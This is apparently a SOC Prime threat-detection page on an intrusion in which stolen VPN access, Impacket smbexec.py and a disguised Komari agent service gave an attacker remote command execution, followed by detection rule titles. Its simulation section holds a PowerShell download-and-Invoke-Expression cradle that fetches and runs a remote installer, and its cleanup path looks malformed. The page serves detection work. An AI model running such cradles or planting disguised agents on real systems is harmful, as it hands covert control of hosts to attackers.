SOC Prime Bias: Critical

30 Apr 2026 14:19 UTC

Komari: The “Monitoring” Tool That Didn’t Need Weaponising

Author Photo
SOC Prime Team linkedin icon Follow
Komari: The “Monitoring” Tool That Didn’t Need Weaponising
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A threat actor used stolen VPN credentials to access a Huntress partner’s Windows workstation, then enabled RDP and deployed the open-source Komari monitoring agent as a SYSTEM-level service disguised as Windows Update Service through NSSM. Once installed, the agent established a persistent WebSocket connection to attacker-controlled infrastructure and provided capabilities such as command execution, terminal access, and heartbeat-style pinging. In practice, the tool functioned as a lightweight command-and-control framework without requiring additional weaponization.

Investigation

The intrusion began with an SSL VPN login originating from 45.153.34.132, followed by the use of Impacket’s smbexec.py to enable RDP and run a series of remote commands. Investigators found that a PowerShell one-liner downloaded the Komari installer directly from GitHub and registered it as a Windows service. That service then launched komari-agent.exe, opened a WebSocket session to the attacker’s server, and enabled arbitrary remote command execution on the host.

Mitigation

Huntress responded by isolating the compromised workstation, disabling the affected user account, and stopping the NSSM-created Komari service. The malicious WebSocket connection was blocked, and the persistence mechanism was removed from the system. Recommended follow-up defenses include tightening VPN access controls, monitoring for suspicious service creation events, inspecting outbound WebSocket activity, and strengthening RDP security.

Response

Defenders should detect creation of a Windows service named Windows Update Service that points to komari-agent.exe, monitor for long-lived outbound WebSocket connections to unfamiliar hosts, and alert on the use of Impacket tools such as smbexec.py for lateral movement. If identified, the affected endpoint should be contained immediately, compromised credentials revoked, and the rogue service removed from the environment.

Attack Flow

Detections

Possible Impacket Command Line Patterns (via cmdline)

SOC Prime Team
30 Apr 2026

Possible Remote Code Execution using Impacket (via cmdline)

SOC Prime Team
30 Apr 2026

Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)

SOC Prime Team
30 Apr 2026

Download or Upload via Powershell (via cmdline)

SOC Prime Team
30 Apr 2026

Possible Remote Desktop Services Shadowing (via process_creation)

SOC Prime Team
30 Apr 2026

Suspicious Firewall Modifications via CLI (via cmdline)

SOC Prime Team
30 Apr 2026

Suspicious Process Utilizes a URL in the Command Line (via cmdline)

SOC Prime Team
30 Apr 2026

Alternative Remote Access / Management Software (via process_creation)

SOC Prime Team
30 Apr 2026

IOCs (HashSha256) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising

SOC Prime AI Rules
30 Apr 2026

IOCs (SourceIP) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising

SOC Prime AI Rules
30 Apr 2026

IOCs (DestinationIP) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising

SOC Prime AI Rules
30 Apr 2026

Detection of Impacket smbexec.py and cmd.exe Execution via RDP [Windows Process Creation]

SOC Prime AI Rules
30 Apr 2026

PowerShell Execution for Komari Agent Installation [Windows Powershell]

SOC Prime AI Rules
30 Apr 2026

Detect Komari Agent Persistence via Windows Update Service [Windows System]

SOC Prime AI Rules
30 Apr 2026

Detection of Unauthorized SSLVPN Access and Post-Compromise Activity [Firewall]

SOC Prime AI Rules
30 Apr 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:
    An adversary has obtained a foothold on a Windows host and wants to install the Komari C2 agent to maintain persistence and later dump credentials (T1003.001). To avoid triggering traditional script‑blocking defenses, the attacker runs PowerShell with -ExecutionPolicy Bypass and directly downloads the installer from the public GitHub repository. The command line matches the detection rule exactly, generating the expected telemetry.

  • Regression Test Script:

    # Komari Agent Installation Simulation
    $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
    $script = (New-Object System.Net.WebClient).DownloadString($url)
    Invoke-Expression $script
  • Cleanup Commands:

    # Remove any files created by the simulated installer (if any)
    Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue
    # Stop any Komari process that may have been started
    Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force